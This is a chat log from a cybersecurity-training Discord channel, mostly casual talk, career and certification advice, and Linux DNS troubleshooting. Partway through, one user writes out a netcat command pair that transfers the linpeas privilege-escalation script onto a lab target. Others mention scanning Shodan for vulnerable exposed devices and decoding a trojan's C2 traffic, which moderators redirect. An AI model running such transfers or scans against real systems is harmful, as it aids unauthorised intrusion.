#general
1 messages Β· Page 82 of 1
LMAO
@sick lance is pretty good
and java ??
That is a general question, nothing wrong with it.
And I'm not the best at python. lol
who knows css
Are you going somewhere with the questions @kindred apex
never played css. tf2 was my jam
@sick lance would you consider yourself more of a scripter than a programmer?
FUCK YAH!
Neither.
Dragonborn Helmet with Dead President's effect, favorite hat and unusual effect
lots of people have
I feel like we're playing 20 questions here with no clear answer in sight...
So do you not put together small scripts ever in your job / hobbies?
who is a programmer here ??
Not as often as I'd like.
who is a programmer anywhere ??
@sick lance can I DM you, I've gotten suspicious dm
There is a discord called something like the Programmers Paradise, that will be the place you need
If you have an issue with another user in the server, you don't need to ask π
(also yes, you can DM)
Is life just one huge coded simulation?
oh k bro
hey man
Hello
Can you please ask people before you DM them, it's in the rules of the server, that you've accepted.
He dm'd me too
H1
Thanks.
Gave +1 Rep to @stoic fjord (current: #1343 - 2)
Thanks
Please what is the meaning of this?
Is it like a rank?
its just a way for the discord mods to see who is being helpful
What are you learning about today rswallen?
learned some snort earlier
0x3 , wizard , infosec dev , god all are just 50 shade of green
nothing wrong with a little green
Don't forget mods
and contributor and bug hunter
orange gangπͺ
Tbh green for a mod with a blue shield makes no sense
I didn't make the colours π¦
what if
I like my name colour.
the one who did had colorblindness
but, 0day is orange, hydra is green, jared is blue and scrubz is cyan
much confusing
Jabba is staff.
More of a sky blue than cyan
Staff overrides mode
very very limited choices of color here
I like scrubs color
0day is old man mod π
All the other colors are bleh
jayy color is best
Yk what would be sick. Dark red with a red and black shield
missing a desaturated yellow
0x9
thats more orange-y
still better than overrated green
room tester?
Would be terrible in dark mode
Jayy's colour is lead bot dev
Eh light red then
Something that strikes fear into users
May cause issues with colour blindedness
π₯΄
forever changing rainbow zalgo
oh it is yellow lol, my monitor has more orange yellows
it is. Im colorblind. Please dont change
white/grey is the unroled colour
π¨
Just us saying hi does that more often than now π
Not for me yet. 
Or the dreaded '... Is typing'
Morning Hydra. π
You're still new at this π
Afternoon
nah, 0xD is god
Iβm curious how do you guys even choose mods. Thereβs so many qualified people in here I feel like it would be tough
among us
Mods are chosen from the Community Mentors.
Ooh

That makes sense
Community Mentors are voted in by the current CM's.
far better than strange women lying in ponds handing out swords, to be sure
hi
HEllo.
I'm fine, how are you?
fine
Truth
That sword looks heavy
. /verify
Hell yeah
I feel like that would confuse someone more
../../../../../verify
i am surprized how i didn't get ban yet
Why is that?
I'm still going through that command challenge that shadow posted a few days ago. π€£
it's pretty fun but challenging
Scrolling through YouTube Shorts and I end up getting @hasty sand in my feed. Mfer's hacking my YouTube too

HACK THE PLANET
DRINK ALL THE BOOZE!
wait wrong song
Get some sleep
I don't know what time it is there, but it's almost noon here.
Or I'd be taking a nap too
almost 5 pm
just got home after work, stopped working at 2:30pm as I started at 6 am
I don't know how you do it Bella. I work from home and I'm dead asleep by 9 or 10pm.
0day is alive.
It's the voices for me
I think Relax was going to send out a search party 
You missed by minutes.
ill pay Sopranos guys to bring 0day to discord π
dinosaurus extingt but no trace of 0day hehe
"What kind of commitment are you will to make, in order to make that reality"
Server ramps up speed and I lose internet connection.... fun
I was playing a game, then it said no internet... I check the router, that's fine. Check my phone, down, laptop up.... like tf
but we will be wrong
might you have flat tire
Sometimes when itβs very cloudy the internet acts up
How long have yβall been hacking
got this mail here
so close but so far... my life have no meaning...
It's about 12 here, so about 2 hrs
12pm
Mines fiber, not satellite. But the fact my server ramped up fan speed like it restarted was weird. No power outage
That is weird
Check the uptime of your router. It sounds like it restarted, since other devices were randomly offline too i.e. phone.
working in cybersecurity for 7yrs, was into hacking as a kid.
Uptime is many many many days, that didn't go down. Server shows power unit powered down then back up 5 seconds later
Nothing but PSU alerts....
maybe it's time for an upgrade.
Of WHAT?
Better user 
Damn
That router was changed recently, been good to me..... minus the VLAN headache it's causing me right now
π±
more than 7
What's your favorite
They're all Synology disk stations 
Security through obscurity π§
That's not even the best one. Browse another category, they got CVE's going back to 2006......
82 CVE's on this one machine... JFC
One exploit doesn't work? Try 81 more!
I'm honestly losing braincells browsing Shodan.... I have lost faith in some people
What you doing
@crude stump
Browsing some categories in Shodan, (and for the mods, ONLY BROWSING) the amount of shit I've seen open that shouldn't be is astonishing
IT π€ not having an accurate inventory of assets
I really wanted to do capture the ether, any place where I can practice it
cause ig the rinksby network is down
Have you found devices that are currently ransomwared?
Not yet, have you found any?
Hi all. I just subbed to tryhackme.com and I'm at the Linux fundamentals part 1 module. I've been trying to get openVPN to work but it will not connect to the configurations given to me by tryhackme. I cannot answer the provided questions and complete the rooms without opening the machine on the vpn. There is a different machine on tryhackme called the attackbox but it can't be used for these specific questions. Is anybody able to help me figure this out? I'm just starting my venture in the cybersecurity area.
Yeah, 3 or 4
Remember how many CVE's were listed?
You can't ssh in to Linux fundemental 1, that's a standalone machine.
You need to level up for the advanced chats, lol
but there are only two option for machines. It says use a vpn or use the attackbox. But the attackbox doesn't have the right answers for that room
So..... got MalwareBytes browser guard, browing some ports on Shodan.... get an alert:
"Website blocked due to insecure login"
You're using the wrong machine, if you look at the bottom tab of the attackbox, you should see `linux fundpar..``
I think I laughed the loudest I have ever laughed at that message
oh man. I feel stupid. Thank you so much
Gave +1 Rep to @sick lance (current: #2 - 2080)
Not stupid, you're not the first that has been caught out, you won't be the last.
hi
I really appreciate your help
Hello π
It's fine, although next time can you use #site-support for support please π
I shoul dhave asked you to go there first.
oh. i'm sorry. will do
Is there a way to configure local dns on ubuntu using commands/shell scripting?
I have found people doing it using the GUI only but surely you can do it through the terminal?
Holy Fucking Mother of God

I just spent two hours troubleshooting a script because i missed a single hyphen
Apologies for the profanity
hyphens, spaces and capitalisation... the true terrors
Indeed
Like when you miss a semicolon...
More than likely, what are you looking for specifically?
Trying to configure local DNS to use quad9's service (9.9.9.9) as the default DNS server using shell scripting
Edit the interface .yaml file located in /etc/netplan
(if I remember correctly)
and then netplan apply
is it not through resolv.conf?
I thought resolv.conf was deprecated in the latest version?
honestly, I may be completely wrong - haven't used ubuntu in a long time so
no idea but I just opened the netplan dir and it only has one file (.yaml)
and it has like 3 lines none of which are useful or related to dns
https://www.baeldung.com/linux/permanent-etc-resolv-conf
does this help?
I'd try the /etc/resolv.conf
what is the discord token for in the account details part of tryhackme?
To verify your account here
if you click someone with a coloured name it will show you their level
I now have 15 E-mails with my beta invite to Arc...
they really want you to use it lol
I get a new E-mail every second day...
I got some on my other email accounts (around 4 unique in total)
is it anygood, this arc thing?
WEEWOOWEEWOOWEEWOO
cat /etc/resolv.conf
# This is /run/systemd/resolve/stub-resolv.conf managed by man:systemd-resolved(8).
# Do not edit.
#
# This file might be symlinked as /etc/resolv.conf. If you're looking at
# /etc/resolv.conf and seeing this text, you have followed the symlink.
#
# This is a dynamic resolv.conf file for connecting local clients to the
# internal DNS stub resolver of systemd-resolved. This file lists all
# configured search domains.
#
# Run "resolvectl status" to see details about the uplink DNS servers
# currently in use.
#
# Third party programs should typically not access this file directly, but only
# through the symlink at /etc/resolv.conf. To manage man:resolv.conf(5) in a
# different way, replace this symlink by a static file or a different symlink.
#
# See man:systemd-resolved.service(8) for details about the supported modes of
# operation for /etc/resolv.conf.
nameserver 127.0.0.53
options edns0 trust-ad
search localdomain
what should i do first comeplete begginer or web fundamentals
Am I supposed to change loopback add 127.0.0.53 to 9.9.9.9 to make it my default dns?
or add a line under it
"nameserver 127.0.0.53"
"nameserver 9.9.9.9"
how would i go about verifying my account
@river drift
Like this
Thanks. Is there a way to confirm it's working though?
Try
dig \@\$DNSIP
recommended order -> #general message
You see it says "do not edit"?
Look into systemd-resolved
Mine doesn't say all that, π
I'm back π
You were gone?
on ubuntu?
Nah, kali.
I didn't want to do anything, but I'm fine now
there be the reason then π
Kali is better? I agree.
Kali is better
it is, but wolverine is using ubuntu
Look
I'm amazed at people's willingness to look past "Do not edit."
Like that's clear...
needs more xfce
It;s gnome
heresy
you should have realised when you saw the panel below
needs more cowbell
it's default
moo 
β― cat /etc/resolv.conf
# resolv.conf autogenerated by '/usr/bin/ivpn-service'
nameserver 127.0.0.1
β― cat /etc/resolvconf.conf
# Configuration for resolvconf(8)
# See resolvconf.conf(5) for details
resolv_conf=/etc/resolv.conf
# If you run a local name server, you should uncomment the below line and
# configure your subscribers configuration files below.
#name_servers=127.0.0.1
TADA
Magic!
Ah I see
vpn works flawlessly so far
Guys how to not become a script kiddie
xfce FTW π
learn how things work instead of just using the soft, even using automatic tools learn what happens on the background try manual configurations, etc
could even write your own versions of tools to gain a good understanding of whats going on under the hood
https://www.obscurifymusic.com/home
Interesting stats
That seems reasonable, the past 4 days i have been doing the networking room and actually learned and understood a lot but now that i got into nmap, i feel like its too much to remeber. Like i cant remember every flag and what packets it sends
that's next level, first you need to hammer the basics down
tfw you see GB and thing storage not country code π
must take notes on everything you learn from the basics to tools.
I thought this too lmao
You mean to write them into txt files
eeew relying on spotify
or cherrytree
TRILIUM NOTES
spotify is pretty much useless unless you have the premium
for that store in database instead of .md files meaning no angry windows defender
ive been taking notes but they're getting kinds messy now, do you have any extra tips
how do you structure yours
structure??? you structure your notes???
you can structure them by tools, rooms, general info.
and here we see apple getting sued in anti trust cases in the usa
iv just decided I should probably keep electronic notes and not paper ones, gonna start copying stuff into obsidian this weekend. looks decent from what iv seen of it so far
yeah??
ok thanks
Gave +1 Rep to @wild rose (current: #380 - 12)
Yup thats what im going to do, im gonna rewatch my completed rooms and take notes
@boreal scarab
where is the ceramic 3d printer???
soonβ’οΈ
you can 3d print ceramics?
probably
not sure ceramic as 100% ceramics. but you have filaments that are infused with things. like carbon, wood and so
there is ceramic hotend and even nozzle that have ruby mineral top head
anybody here got final fantasy knowledge
I'm pretty sure its a game series.
but that is about the extent of my knowledge of it
"final fantasy knowledge"?
ask chatGPT π
its a movie series according to that
yes. and quite big serries
thinkin about starting playing the series but need agood order
sequencial?
it appearsto have a zelda like timeline
...
FF series should be played in the order they're released in.
this on ma machine
ββ$ nc -l -p 1330 < linpeas.sh
this on the remote : basterd@Vulnerable:/tmp$ nc ip 1330 > linpeas.sh
Honk mimimi
With the exception of FF X and FFX-2, FFXII and FF VII with the spins off, they're not really related.
You'll get the odd easter egg here and there.
What is this supposed to mean
hey guys
not really, there's no real connection between them besides mortifies
Hello
is this for a specific THM room?
yh yh
Is this for THM?
Honk Shoo / Mimimi are onomatopoeias of snoring popularized by television cartoons, particularly in the early and mid-20th century. In the 2020s, the terms became popularized in memes, with many jokes pitting the two against each other and referencing the sound effects from old cartoon shows.
Step over to #site-support
yup
Refresh your client homie
Not on mine you didn't.
It's not, refresh the client.
probably best to try in #room-help
this channel tends to move fast
Or, use the channel that is intended for room help, lol
have you played the new ff7 rebirth?
out of context.
Not yet.
honk
shoo
It's better than remake
Hiya
Heap!
Not much, currently digesting wonderfully tasting food and thinking about taking a nap (I mustn't, I got stuff to do that's got a deadline that's tomorrow morning). You?
Canβt wait to cook, so hungry
A little nap wouldn't hurt :p I'm currently trying to solve a RE challenge
eating things raw is not good for you π
This is so funny ahahah
Twisted my whole perception
there are ceramic 3d printers used in dentistry, to print crowns and the like
carrots taste best raw.
I dare you to fight me on this.
I'm here all way π π π
How do you print ceramic?
ah jea that. didn't cross my mind. was thinking "home user" printer
honey sauteed carrots
you dont print it as you might think.
Hm Iβm guessing itβs sort of like a resin printer but with ceramic?
you can steam them, or slow cook under low temp too, other than in a salad there aren't many places for raw carrots
like two component glue. something like that yea
Carotenoid absorption will be better when cooked rather than raw though.β’οΈ
full size 3d print. =/
human adult size?
1kg of filament is around 30e cca
are people with a cybersecurity profession more likely to get cyber attacked?
yes, because they are more likely to be on a targeted network
I mean if your a admin for a company a threat actor might focus on you then someone else
Basically got the keys to the city
same reason tornado chasers are more likely to get caught in a tornado than the general population
One one hand, they are useful targets. On the other hand, they know more how to secure themselves
But at the same time a cybersecurity specialist knows more about internet safety so going after someone with none might be there main priority
Not entirely, if you take the basic steps to protect yourself like not reusing passwords, enabling 2FA, and keeping up on your cyber hygiene you shouldn't be a high target compared to someone in HR, C-suite, or a domain controller admin.
I wonder what's the most targeted cybersecurity position
intern
This
yeah don't do that one. lol or don't be on social media at all.
Uploading the whole daily schedule online
as a not super social person it's been eye opening reading the mitnick book, just how much he did with lists of employees/roles and such 
Which book?
ghost in the wires
Thanks
np it's a good read/listen
boing boing boing boing boing boing boing boing
SEC573: Automating Information Security with Python
Anyone know how to get a free course of this
la llama que llama π
sec573: automating information security with python free GIAC
Anyone know how to get a free course of this
Work for a company/instutution that pays for you to take it.
If it costs money, someone has to pay for it
It's a very expensive course
It will not be free
Yeah by paying for it
who tf payn for tht
People
why is it so much lol
Organizations will and do.
have u guys taken it?
I got about 15 grand worth of training at one point that way.
i mean if u count degrees
Usually companyβs buy it for there workers to train
ahh that makes sense
Yeah, generally 100% a business need or contract obligation
if they can get a package deal
anyone know of any internships to apply for?
i getting at over 200 applications this week
Search indeed
got every indeed post
LinkedIn/Indeed will help you far more with that as it will need to be local.
Use LinkedIn
linkedin covered too
Hmm
lockheed and raythion covered
Could be your CV isn't making it through bots or you are just lost in the volume
Wdym covered
i mean i only applied to these within the past week
Oh
applied for
Bruh, some of those takes a very long time to hear back on lol
It will prolly take awhile
Even months
Over what time period have you sent almost 200 apps?
or is there a better/cheapeer alternative
8 days
Damn lmao
Wow..thats nuts, do you just spray and pray?
lmao
What are you gonna do when they answer you
get my interview game on
spray and pray is best way to get interview if you don't know what you are doing
then what entails knowing what you are doing?
Somones with connections
i have multiple resumes to cater to position
Get a job fast
yeaaa i need to go out and network
cant seem to find any tech related events tho
in NYC too
only one i found was some bootcamp thing
Really? I'd suspect tailoring the application to each opportunity is much better, especially when considering how many apps they must get
scouting the employees of the company, befriending them in a social setting, talking about your competence π₯·
How I do it
Key words
Then you already are knowing what you are doing, no?
I guess
thought about that but felt like it was a bit weird
Yes
Hand him a Hundred and tell him to buy himself something good tonight
naw, you need to get along with the person who would be involved in the hiring process, go out with a "potential future boss", have few drinks and some man to man conversations
Tell him you live in a mansion
I slept my way to the top
Anybody here going to get the brain chip
at my desk
Hell nah
will it get me an internship?
Why not, it worked
Maybe if Iβm paralyzed
or a monkey
I personally don't feel comfortable with something like that in my most vital organ
feels weird to be promoted when everyone around you is actually doing the things and are more competent
Exactly that. You hear a faint whisper in your ear βtake over the world my personal robotβ
But as Warren Buffet said - if you don't make money while you sleep, you will never become rich
So I started sleeping at work
eh although the chip isn't capable of transmitting thoughts to your brain
that's why I get paid overtime when I'm oncall
its only able to read your thoughts and upload them atm
like if you want to play Pong
dont want my thoughts being uploaded to the cloud kthx
don't want to download someone else's thoughts
they'll probably serve you ads 24/7.
My thoughts: ||Never gonna give you up||
Then you'll need an additional chip to block ads.
π
you read my thoughts
I almost got rickrolled atm
then you need to pay for subscription to not have ads
but the service will change and you will only pay for less ads
Wireless charging
Charge
so you have to plug yourself in using USB-C
Yk those movies where they gotta plug themselves in with a charger to sleep
Lmao dex is one step ahead of me
hi all i have question how i can do architecture of honeypot for protect system if you have advice
Iβm not understanding
i want do like simple architectur for see threat in system by using honeypots
Ok, so do it?
You can build a fake SSH server
There asking how
For instance.
i know i see low interaction honeypot like cowrie for ssh
i read this room
Ok so, what exactly are you asking for?
Spin some up in a lab and see what they do
i want like using dionaea on docker for see in the first how its works
Try it
@astral fiber Do not send unsolicited direct messages, it is against the rules
@astral fiber Please do not send DMs without getting permission first. It is against the rules.
okay i understand
Is there a book I can read? Most certification courses have books. I don't see on amazon
Yes, it's part of the course material that you purchase
You realise that SANS courses are notoriously expensive right?
Who got 9 bands laying around
There's Blackhat Python instead if you just want a book
I see you can join the school for free till you get a job
Too simple
SANS course are designed for employers to purchase to train employees
If that's too simple, you evidently know enough to do self learning
Yah most of it is showing you how to connect sockets and make tools. Plus command and control centers with python. I rather have a project based book to do some little sample works
Find some projects then and do
You want the course without paying?
Pentesting CompTIA reflected intro to ethical auditing
And everyone like sybex makes a book
Why not GIAC
hey can someone help me with an encrypted string? i think it's base64 but can't decrypt it
Industry doesn't work like that
where's it from
Google decrypt base64
Hello
SANS provide good training material. That's their market offering. No one tries to write material for their courses and exams
I asked where it's from, not to post it π
ok, it's from reverse shell trojan malware, that connects to C2
@thorn basalt
wtf comptia pentest is 400$
That's cheap for a certification.
so the connection allows to execute commands and it sends them encrypted
should i get it
It's pretty decent, I took it and passed
or is getting the normal comptia what i should aim for
It's like everything from the PenTest PBQ and then some
Wat?
Comptia are a company
No
No you should aim for stackable certification from CompTIA and ethical hacking certification from e council
π€’
Everyone posts materials for books online and learning
No they want you to pass by their definitions
And it's just PBQ to become junior PenTest
Also pentesting by their definitions is just auditing not like a criminal bug bounty hacker
is there any entry level jobs and or internships tht make sense for a pentest comptia cerrt?
You ok?
No penetration jobs are usually for people with higher experience and higher degree
Lawd
PenTest gives you that your knowledge in pentesting not being a super skilled in hacking and finding every flaw
mmhmmmm
ok hb this cert? https://security.ine.com/certifications/ejpt-certification/
Which company wants
Companies want people with experience in pentesting, you got to start from sysadmin or something
You very much don't have to
Look at job description 3-5 years experience in diagnosis and blah blah blah certifications
Lmao, that's not a requirement.
They're always "our ideal candidate" not requirements
And lawd not github
This ain't dev
OSCP has the best mindshare IMO
It's auditing, you show you did dam vulnerable and many other things
Lmao
OSCP is recognized globally. Not all certs are iirc.
OSCP doesn't tick compliance boxes for pentest roles
I disagree with not having programming knowledge to show like CompTIA PenTest shows
I push sensitive outputs from pentesting engagements to public github repos. My customers enjoy being able to access the findings quickly.
so what does
Depends on the country etc
Sec+ is good for gov work in the US..
Why would you show actual work vs labs from vulnerable virtual machines
US Pentest+ ticks the box but I think DOD 8570 or whatever is getting overhauled
Moose was being sarcastic
8140
ok so DOD 8570 is the best?
That's mandatory I think
Ah it's out? Excellent
Listen to moose. π
8570 only matters if you're trying to do DOD work
ok lets be straight forward here
8140 is the replacement but it's not fully implemented yet
awhhh man
There's no "best"
Security+ is the baseline for security
Best to work in the field and I need help finding that impossible content
That exam is the bare minimum amount of knowledge that you need
this will chear you up
https://github.com/coreutils/coreutils/blob/48cd67663daceba437c327c18a963634e3430c9c/src/stdbuf.c#L328
There is exam questions and no study guide yet
haha brilliant π
yup 
Strongly recommend you don't get a cert just to get a cert, or because you think it will open doors. It won't, by itself. Look at job reqs in your area, and target your learning for the things those are asking for.
What do you mean?
It's always best to just work in the field and gather certification like juun days
which one? SYO-601 or 701
No that isn't a clarification on the statement I replied to
Yah I mean the book for the class, all I see is exam questionnaires
Yup
I swear to whatever deity, stop trying to pirate that damn sans course or I will ban you
Government jobs are a different kind of thing entirely than private sector. Comparing hiring requirements between them is like comparing arsenic based life to carbon-based.
I haven't kept up with the exam cycle. Take whichever, just know that one will be retired and you'll need to take the exam before the retirement date
601 will be retired*
Okay
Look up the retirement date and if you think you can study and take the exam before it sunsetting, go for it.
can anyone help me with decrypting a string? I'm stuck
this one
I have already directed you to the advanced channels π
To clarify, we don't discuss malware analysis outside of the advanced channels
but i need to be level 13 or OSCP, lol
It's a potentially dangerous area of study
ahh okay
Scary stuff right there
one day!
two days!
3 days
its gonna take me a while to get top rank, but I look forward to knowing more by then 
Yes that's what happens when you expose stuff to the internet
You're on public infrastructure, it'll happen
There watching
They run a cloud
wait for the 40 thieves π
They wanna know what your cooking
They knew you were making to much. Suppressed you
I need to order more chocomel
Flavoured creatine was probably not my best purchase
Yea, never go for flavoured
I 'dry scoop' so I thought it would be better to go flavoured
it doesn't sound good
non flavored creatine is hell =/
the flavour is not that good.. strawberry and lime
I think I'm conditioned to the chemical taste of unflavoured, it doesn't phase me
I don't get point in flavoured creatine when theres shakes for that
I thought it would be nicer for dry scooping but it's so strong
you can take with no flavor for sure. kreatine don't have bad taste, compared to BCAA natural taste
Creatine? I don't think you're supposed to.
You can there's nothing wrong with it
yep. tbh one of most terrible taste i know from chems
It's not dry scooping per say, I just fill my mouth with water and scoop into my mouth
Flavoured creatine is ultra processed that's why I stopped taking it
You aren't meant to dry scoop anything
I usually take creatine tablets
flavor is added. you can also use some dextroze if you wish to add some "taste" to almost anything
You should only take dextrose if you need it
Mhm but not to confuse your statement with "dextrose makes everything taste better" because you will give yourself diabetes
true...
Whats the string malware analysis tool called Yet another ****
Always forget
Found it nvm
Was bouta say. How do you not choke on powder
Like eating a popeyes biscuit with no bev
is there a way to use the static analyse room for malware analyse on a file i found? cant use my own pc as iam not at home π¦
or do i break the rules or smt when i transfer it via the keyboard ?
I believe putting malware onto the machines is against the site's terms of service.
They are not intended for personal use regardless.
ahhh damn π¦ ty for the answer
Try malwarebytes
@crude stump y or falcon sandbox, the problem is, i cant deobfuscate it and just get the sourcecode there
Jared Iβm saying if he thinks he has a file thatβs infected scan it with malwarebytes
Jabba I ment
its infected. i already know it
Oh
100%. i also know which techniques it uses. but i need to get a vm where i can decompile & deobfuscate it, so i hoped i could quickly take the room vm as there are already the tools i need and the possibility to transfer it
but if its not allowed i dont do it. thank you anyway guys
We limit malware discussion to the advanced channels π
@mossy river guess i have to link my discord to the thm account soon. anyway π ty for answer
Gave +1 Rep to @mossy river (current: #6 - 1199)
@crude stump ty
Maybe you should pin this so people know
Or I mean
Pin it so all you gotta say is check pins
It's confusing and still relies on me saying "check pins"
Someone might check the pins looking for resources etc.
Ah true
Had AI make a cool claymation image of a 1980s "hacker" in an office setting and honestly, it's neat. usually very hit and miss
Bros hacking a city
is that the empire state building???
im surprised it made a decently good looking chinese characters
Yeah it usually fumbles on that
unable to download wreath vpn :(
What subnet are you on?
Open the wreath room and screenshot the network diagram please
alright
Aw yeah, AI has come so far what with this machine learning derived song 
https://app.suno.ai/song/7fd34463-d28d-4f2f-a6c3-a132a0c0466b/
@sinful moon Hi!!! No time no see π
Heya! (also the above is halarious)
I've been around but busy with work as always, but did get to see a show last night which was nice
I thought it was me because I change time zones, I'm in Argentina visiting my family π
Nah only one or two timezones away from me, I'm in EST. But nice!
I've met a lot of retro gaming friends from Argentina on Discord
Israel is 5 hours and 6 in summer hours ahead of Argentina the first 3 days jet lag was the B.... π
Oh damn, I forgot you were based out of Isreal but yeah, must have been rough
Thankfully I've not had to experience jet lag. I've just been up and down the US East coast for the most part
BRazil and Argentina
Half my retro systems friends be from abouts there
Oh yeah there's plenty in South America, especially with the massive Sega dominance
hmm, it still seems like AI or too much autotune
lol that's the point, indeed
It's spitting out a basically "I can't fufill that request" prompt, but this is a song generator so it'll still make a song out of it
I sadly watched madame web since I got a free ticket
and I have to say its a ~~great ~~movie
Hmm, didn't realize that, gotta pay attention to lyrics
anyone wanna have some fun troubleshooting with shadow???
send it over
somehow shadow about once every 3 months corrupt their sudo cache making it impossible to run sudo commands until they relog
any idea what could cause it or how to fix???
I've not run into that in 16 years of Linux use. Real weird issue
possible crontab modifying that 3 months of a unrelated process
Are you using any PAM stuff?
it fails on the password prompt taking all passwords as invalid
well kinda
That's about my only thought, other systems that hook into this sorta thing
What is that PAM solution you're plugging in if you don't mind me asking?
pam is only plugged into lightdm and not sudo
and in there shadow also added the option to use a yubi key for login
Fair enough, yeah normal use case
Hmm, maybe something weird there but I doubt it
I just know my work MFA can hook into PAM and many other security solutions can so I was curious
You are asked to test an application but are not given access to its source code - what testing process is this?
black box
pls can anyone help with this question
wow, thanks!, i was writing black box testing, and the system keeps saying incorrect answer
Gave +1 Rep to @wild rose (current: #352 - 13)
this is so stupid but hilarious
lol indeed, please sing your stock AI "I can't complete this request" responses to me
the copy and paste on the attack box is insufferable
And that's why eventually you use a VM or VPS as an attackbox imho
works on firefox one way
I mean it works on Firefox, but you have to jump through the same hoops. There's no true copy buffer shared between them
i do use a vm but for the snort room you have to use the attackbox
Fair enough
its just the dang highlight disapears
like its highlighted and when you click off of it to copy it disapears
Also Ellie since you're here, give me a couple of the best live action adaptations you got
you ever wanna punch a hole through your screen
not yet
whenever Docker isn't working
oh missed the wanna in there
This van near my house is like on a schedule, every 7 days at 12 at night, he moves his van somewhere else on our street
Very weird
....
lmao what
Why does that fit up with every movie with the FBI in a van
free wifi
Literally LOL
They need to change their playbook, the movies have taught me enough π
Go to the van and give them "pizza delivery"
see in the window a whole server rack in it
Honestly the dude inside wearing full black with a black cap on, Iβd rather not even look in his direction lmao
Although if it seems like a actual concern just call up the local law enforcement and report it
My assumption is heβs living inside of it so heβs moving it around to prevent someone reporting him
Yeah until they tell me not to worry about it 
if they come and kick the guy out, probably a random guy
omg i cant. this whole time my snort rules werent working because instead of making the sid:100001 and 100002 i made the rev1 and rev 2
Live action adaptations of what? Books, stage, etc? Kind of a vague question
And even then the movies often differ dramatically vs the sorce material
do satalites run off of wifi?
Eh in general, tired of movies with original plots, looking for some type of adaptation
Tired of movies with original plots??? But uh my favroite adaptations I've mostly already told you
hmm
What about a movie with great sound design and nice music
Watched baby driver, something like that
2001: A Space Oddesy, Blade Runner, Starship Troopers, The Maltese Falcon, and others could be considered adaptatinons
Shawn of the Dead
Same director
Fantastic movie
also same director lol
yeah it's a good time for sure
Edgar Wright has a great knack for creating fun movies
Hot Fuzz is also decent but not quite as up there, then his bar hopping one was only alright imho
Hot fuzz is the accident one right
Going back though, his TV show, Spaced, was quite good
I believe I watched it a few years ago but its worth a rewatch
Shaun of the dead and hot fuzz are great
there should be a cyber warfare room where you battle it out with other hackers
I love the idea.. Sounds a lot like KOTH on the website though
True
Who can type faster
Screwed around with SSH certs and SSH-SK keys, fun stuff.
Nearly locked myself out of everything, but fun.
hacking is so fun!!
Reminds me of linux russian roulette
That's not a burger or cheese π
It very much is.
"huh, shit, guess I used require instead of optional in my PAM auth"...
Cycled all my keys, got FIDO-backed SSH keys and login manager now.
I'm gonna be better secured than the Infra I used to manage.
Wait, I disable root login, so I already am! 
Tomorrow I'm gonna yubi LUKS. Thought it best to do that when it's not 3.30am.
Quick question: what is a busybox
I've searched it on Google but I still don't get it
Is it a set of "pre-compiled" binaries or "pre-made" Linux commands to use/upload on other Linux machines?
Correct me if I'm wrong
Stripped down Linux commands
symlinks to busybox for commands.. limited... slightly.
Hii guys I have a question I am doing pre security from THM I want the certificate do I have to pay for it or it's free
π
Certificate is free. It's not a certification. Don't get the two confused. π
I don't know if ISC2 is still doing the 1MCC.. but if you're looking to be certified.. it may not be a bad option..
gawd.. I don't know why nobody is liking me on my tinder.. I DID put that I use Arch.. 
just came on too strong, now they're intimidated by your obvious taste
But why? I didn't even say "by the way". π€£
I should put "If you've never built LFS.. you should." lol
or some random 1337 looking Linux command.. that'll get me friends. lmao
Um
its raining for you also?
It stopped earlier. WA.. go figure.. rain.. heh
hmm, raining for me atm
I haven't been outside for a few.. so maybe.. I'll be in a bit.
Ook thanx
No rain
Differating between certification and attendance certificate can be confusing if both words are so similar
A certificate is merely an acknowledgement of completion whereas a certification is an accredited document stating that you have completed an exam on a certain subject by an accredited examiner. Best way I can state off the top of my head.
I am also not the smartest person in the room.
Sadly it is very ambiguous for many of us who don't speak English natively since it may or may not translate into 1 word
English is hard.. Even for native speakers.
And well, even for those who know, you may think they are the same because root word is the same, well, luckily people find it out rather fast
I look at all 'Certificates' as 'Certificate of Completion'. Certification is different. It's a 'proof of knowledge' type thing.
Rennet.. you are used to make cheese.. π 
And it's my sleepy time. Good night all. π Hope you sleep well or have a good day.
Goodnight
I need to get into the cheese business, my name would fit in the trade
hey all i have been facing issue in connecting breaching AD lab i have connected with my VM /openvpn. VPN is assigning me the IP but in THM the connectivity status still shows not connected.
Heya Scrubz
Hello
β₯οΈ
Aside from the, uh cheese and the bun by the looks of it lmao
Oh, all that is vegan, even the cheese
Wait, what?
That's some impressive melting
I was impressed too. Thing was damn good
@pallid lotus tell your pfp to stop changing
Pfp, stop changing
Happy?
Yeah, it's back to normal, thanks π
Gave +1 Rep to @pallid lotus (current: #9 - 738)
Literally didn't do anything, but Okey dokey 
Hello guys i have a general question concerning AD (not related to a room) can i ask it here ?
I know, it's for some reason my your pfp is the butterfly when I'm on the mobile app
Sure.
Thanks, my question is about Kerberos. The Service ticket content is composed if i understood well in two. 1/Service portion and 2/User portion. The Key for the Service portion can it be NTLM hash ?
IIRC it's not a NTLM hash
Look in to the KDC.
Unless I'm completly wrong, it's been known to happen 
Yeah same for me but i saw on a website that it was encrypted with the account NTLM hash
so im confused
It depends on the kerberos type
Is it an NTLM hash at all?
Hi Scrubz
Hello acme.
Hyd?
Good, yourself?
yes
Nice, im fine too, thanks
eType 23 TGS tickets are encrypted challenges where the key is the NT hash of the password
There is more than one kerberos type ? Ok im more confused Hahaah
Ok ill check this Thanks.
Gave +1 Rep to @polar spoke (current: #155 - 40)
Are you excited for next monday?
What happens then?
If all goes well, you will then receive a green role
Oh! it's only 3 days.
For some I was thinking of two backs.
Time flies